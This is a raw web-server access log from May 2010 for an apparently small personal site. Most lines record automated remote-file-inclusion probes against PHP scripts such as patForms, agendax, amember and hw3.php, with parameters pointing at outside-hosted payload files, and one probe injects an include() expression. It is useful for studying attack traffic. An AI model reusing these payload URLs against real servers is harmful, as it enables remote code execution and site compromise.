189.108.172.26 - - [01/May/2010:06:10:26 -0500] "GET /logs/access_log.1268611200%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:26 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:26 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:26 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:26 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:27 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:27 -0500] "GET /logs/access_log.1268611200%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:27 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:27 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:28 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:28 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:28 -0500] "GET /logs/access_log.1268611200//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:28 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:28 -0500] "GET /logs/access_log.1268611200//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:30 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:30 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:30 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:31 -0500] "GET /logs/access_log.1265932800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:31 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:32 -0500] "GET /logs/access_log.1265932800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:36 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:36 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:36 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:36 -0500] "GET /logs/access_log.1265932800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:37 -0500] "GET /logs/access_log.1265932800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:37 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:37 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:41 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:41 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:41 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:42 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:42 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:42 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:06:10:42 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:48 -0500] "GET /logs/access_log.1265932800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:50 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:50 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:50 -0500] "GET /logs/access_log.1265932800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:06:10:50 -0500] "GET /logs/access_log.1262390400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
209.62.121.162 - - [01/May/2010:06:13:27 -0500] "GET /logs/access_log.1219708800//citywriter/head.php?path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:06:14:22 -0500] "GET /logs/access_log.1230163200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.62.121.162 - - [01/May/2010:06:15:39 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.62.121.162 - - [01/May/2010:06:15:39 -0500] "GET /logs/access_log.1219708800%20%20//agendax/addevent.inc.php?agendax_path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.62.121.162 - - [01/May/2010:06:15:40 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:06:17:38 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:06:17:38 -0500] "GET /logs/access_log.1182297600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.120.217.139 - - [01/May/2010:06:20:34 -0500] "GET /logs/access_log.1219708800//agendax/addevent.inc.php?agendax_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
174.120.217.139 - - [01/May/2010:06:20:34 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
174.120.217.139 - - [01/May/2010:06:20:36 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.62.121.162 - - [01/May/2010:06:21:54 -0500] "GET /logs/access_log.1219708800//agendax/addevent.inc.php?agendax_path=http://www.waterdistrict2.com/poll/image/TRQ1.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.195.232 - - [01/May/2010:06:26:24 -0500] "GET /logs/access_log.1193788800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.130.126.109 - - [01/May/2010:06:26:43 -0500] "GET //mcf.php?content=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
195.130.126.109 - - [01/May/2010:06:26:43 -0500] "GET /logs/access_log.1213401600//mcf.php?content=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
195.130.126.109 - - [01/May/2010:06:26:43 -0500] "GET /logs//mcf.php?content=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
195.130.126.109 - - [01/May/2010:06:26:43 -0500] "GET /logs/access_log.1229731200//mcf.php?content=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
121.254.228.21 - - [01/May/2010:06:27:01 -0500] "GET /logs/access_log.1264204800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:01 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:01 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:04 -0500] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:04 -0500] "GET /logs/access_log.1264204800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:04 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:04 -0500] "GET /logs/access_log.1266019200//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [01/May/2010:06:27:06 -0500] "GET /logs/access_log.1266019200//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.130.126.109 - - [01/May/2010:06:27:32 -0500] "GET /logs/access_log.1213401600%20//mcf.php?content=http://195.130.126.109/SQLiteManager/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.176.226.186 - - [01/May/2010:06:28:03 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.176.226.186 - - [01/May/2010:06:28:15 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.110.50.119 - - [01/May/2010:06:28:50 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [01/May/2010:06:28:50 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
91.76.99.222 - - [01/May/2010:06:29:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
207.46.199.199 - - [01/May/2010:06:35:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.47 - - [01/May/2010:06:38:54 -0500] "GET /logs/access_log.1160524800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.86 - - [01/May/2010:06:46:55 -0500] "GET /logs/access_log.1199577600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.115.131.17 - - [01/May/2010:06:51:09 -0500] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
203.115.131.17 - - [01/May/2010:06:51:09 -0500] "GET /logs/access_log.1263859200//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
203.115.131.17 - - [01/May/2010:06:51:09 -0500] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.115.131.17 - - [01/May/2010:06:51:13 -0500] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.115.131.17 - - [01/May/2010:06:51:13 -0500] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
203.115.131.17 - - [01/May/2010:06:51:14 -0500] "GET /logs/access_log.1263859200//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:06:51:35 -0500] "GET /logs/access_log.1269734400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [01/May/2010:06:52:02 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.198.21 - - [01/May/2010:06:55:17 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.jp/spider/)"
207.46.13.136 - - [01/May/2010:06:56:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.136 - - [01/May/2010:06:56:24 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.92.94.85 - - [01/May/2010:06:56:48 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
207.46.195.241 - - [01/May/2010:06:56:55 -0500] "GET /logs/access_log.1194220800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.53 - - [01/May/2010:07:05:55 -0500] "GET /logs/access_log.1162339200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.92.94.85 - - [01/May/2010:07:06:22 -0500] "GET /logs/access_log.1270684800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
77.92.94.85 - - [01/May/2010:07:06:22 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
77.92.94.85 - - [01/May/2010:07:06:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
77.92.94.85 - - [01/May/2010:07:06:24 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
77.92.94.85 - - [01/May/2010:07:06:24 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
77.92.94.85 - - [01/May/2010:07:06:24 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
77.92.94.85 - - [01/May/2010:07:09:50 -0500] "GET /logs/access_log.1270598400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
207.46.13.41 - - [01/May/2010:07:10:54 -0500] "GET /logs/access_log.1229644800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.135.134.108 - - [01/May/2010:07:15:33 -0500] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:15:33 -0500] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:15:34 -0500] "GET /logs/access_log.1264723200/contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:15:35 -0500] "GET /logs/access_log.1263168000/contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:15:38 -0500] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:15:38 -0500] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:15:39 -0500] "GET /logs/access_log.1264723200/contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.135.134.108 - - [01/May/2010:07:16:35 -0500] "GET /logs/access_log.1263168000/contrib/mx_glance_sdesc.php?mx_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
111.89.128.186 - - [01/May/2010:07:20:24 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.250.255.243 - - [01/May/2010:07:21:21 -0500] "GET /logs/access_log.1226534400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.227 - - [01/May/2010:07:22:24 -0500] "GET /logs/access_log.1174694400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
68.233.226.215 - - [01/May/2010:07:24:19 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_20"
67.195.112.180 - - [01/May/2010:07:27:30 -0500] "GET /artwork/jewelrybox.htm HTTP/1.0" 200 827 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.199.14.1 - - [01/May/2010:07:28:10 -0500] "GET /logs/access_log.1264118400//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:28:10 -0500] "GET //skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:28:10 -0500] "GET /logs//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:28:10 -0500] "GET /logs/access_log.1262390400//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:29:08 -0500] "GET //skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:29:08 -0500] "GET /logs/access_log.1264118400//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:29:08 -0500] "GET /logs//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:29:08 -0500] "GET /logs/access_log.1264291200//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.13.144 - - [01/May/2010:07:31:55 -0500] "GET /logs/access_log.1205193600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.199.14.1 - - [01/May/2010:07:32:14 -0500] "GET //skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:32:14 -0500] "GET /logs//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
88.199.14.1 - - [01/May/2010:07:32:14 -0500] "GET /logs/access_log.1270857600//skin/inrize_blue/setup.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.46.13.134 - - [01/May/2010:07:43:25 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/May/2010:07:43:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.9.14.148 - - [01/May/2010:07:44:28 -0500] "GET /logs/errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:07:44:28 -0500] "GET /errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:07:44:28 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:07:44:30 -0500] "GET /errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:07:44:30 -0500] "GET /logs/errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
